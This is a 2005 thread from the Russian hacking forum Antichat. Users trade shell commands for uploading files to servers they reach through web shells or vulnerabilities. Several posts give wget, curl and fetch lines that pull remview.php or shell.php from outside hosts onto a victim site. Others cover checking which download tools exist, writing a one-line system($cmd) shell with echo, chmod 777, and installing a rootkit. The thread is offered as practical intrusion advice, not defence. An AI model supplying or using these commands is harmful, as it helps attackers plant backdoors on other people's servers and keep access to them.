ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Оффтоп > Болталка
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Команды.
  #1  
Старый 26.04.2005, 16:00
Аватар для gangster!
gangster!
Новичок
Регистрация: 24.03.2005
Сообщений: 2
Провел на форуме:
27671

Репутация: 0
По умолчанию Команды.

Какие команды можно выполнять на шеллах или найденных уязвимостях ! Допустим я знаю такие команды как pwd , echo , ls -la , wget , cd ,cat.. Но это все команды для листания !! А какими командами можно сливать или заливать файлы на сайт ! Например на некоторых сайтах wget не работает а если я пишу curl -o ./remview.php http://mysite/remview.php то заливается но при попытке обрашения к нему выдает ошибку 302 : Found
The document has moved here
 
Ответить с цитированием

  #2  
Старый 26.04.2005, 16:50
Аватар для KEZ
KEZ
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию

Ну тут нужны прямые руки а не банальное знание команд.
Например утилита wget (часто /usr/bin/wget) может скачать по http файл и положить его в папку... Например wget http://.../remview.php -o remview.php
также можно качать файлы lynx'ом (текстовой браузер, мой любимый)
и другими прогами...
/usr/bin/ps пок. список процессов... если тебе нужно поставить хороший руткит, это тоже в аську сдесь долго писать
ещё
можно использовать echo ))

проверь, какие утилиты есть в с-ме: which wget
если все ок, тебе покажут /usr/bin/wget
 
Ответить с цитированием

  #3  
Старый 26.04.2005, 20:28
Аватар для coyl
coyl
Участник форума
Регистрация: 14.01.2005
Сообщений: 127
Провел на форуме:
96115

Репутация: 5
По умолчанию

да. у меня похожая проблема. КЕЗ, напипши, пожалуйста как посмотреть какие ваще утилиты установленны. например про вгет и кёрл можно узнать через phpinfo()...
И еще у меня конкретный вопрос: на серваке не стоит ни вгет ни кёрл... через чё можно файло закачивать, что стоит в большинстве систем?
 
Ответить с цитированием

  #4  
Старый 27.04.2005, 06:15
Аватар для Morph
Morph
Постоянный
Регистрация: 13.08.2004
Сообщений: 957
Провел на форуме:
1770063

Репутация: 429


По умолчанию

ЭЭЭэ погодите это все конечно хорошо но при чем тут Взлом Форумов?
Переезжаем.
 
Ответить с цитированием

  #5  
Старый 28.04.2005, 19:39
Аватар для coyl
coyl
Участник форума
Регистрация: 14.01.2005
Сообщений: 127
Провел на форуме:
96115

Репутация: 5
По умолчанию

переехать то переехал, но тему так и не раскрыли =)
 
Ответить с цитированием

  #6  
Старый 28.04.2005, 19:47
Аватар для Trinux
Trinux
Познавший АНТИЧАТ
Регистрация: 26.11.2004
Сообщений: 1,149
Провел на форуме:
941818

Репутация: 569


По умолчанию

Я ваще с линуом немного на ВЫ, но когда было дело юзал в оснавном:
wget - заливал (если нет его, то средствами php или mysql, смотря куда есть доступ)
tar, gzip - архиваторы
cp - копирование
chmod - сменить чмод файла
mkdir - создать диру
ну и в остальном всякие типа mysqdump итп, не имеющие отношения к линю. Но чаще всего это cd, cat, ls
 
Ответить с цитированием

  #7  
Старый 28.04.2005, 20:28
Аватар для BNF
BNF
Познающий
Регистрация: 16.04.2005
Сообщений: 62
Провел на форуме:
53206

Репутация: 5
По умолчанию

можно ещё такое:

** Записать новую инфу в файл:
echo "my new file content" > file.txt

** Дописать в конец файла:
echo "my add file content" >> file.txt

** Ещё есть замечательная команда: man Например:
man lynx

** Запуск какой-то утилиты в фоне (на конце знак бэкграунд процесса):
/usr/bin/some_util &

** Полезная команда смены прав:
chmod 777 file1 file2 file3...
 
Ответить с цитированием

  #8  
Старый 30.04.2005, 20:02
Аватар для Fan
Fan
Новичок
Регистрация: 11.04.2005
Сообщений: 7
Провел на форуме:
79502

Репутация: 3
По умолчанию

не понимаю людей короые заливают шелл из одной строчки (system($cmd)) вгетом... а потом кричат что не работает. echo не судьба юзать?
 
Ответить с цитированием

  #9  
Старый 16.07.2005, 07:40
Аватар для JayTi
JayTi
Новичок
Регистрация: 14.07.2005
Сообщений: 2
Провел на форуме:
544

Репутация: 0
Отправить сообщение для JayTi с помощью ICQ
По умолчанию

wget http://xxxx.xxx/shell.php
curl http://xxxx.xxx/shell.php без всяких -o
fetch http://xxxx.xxx/shell.php - вот была сегодня одна только качалка на сервере
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ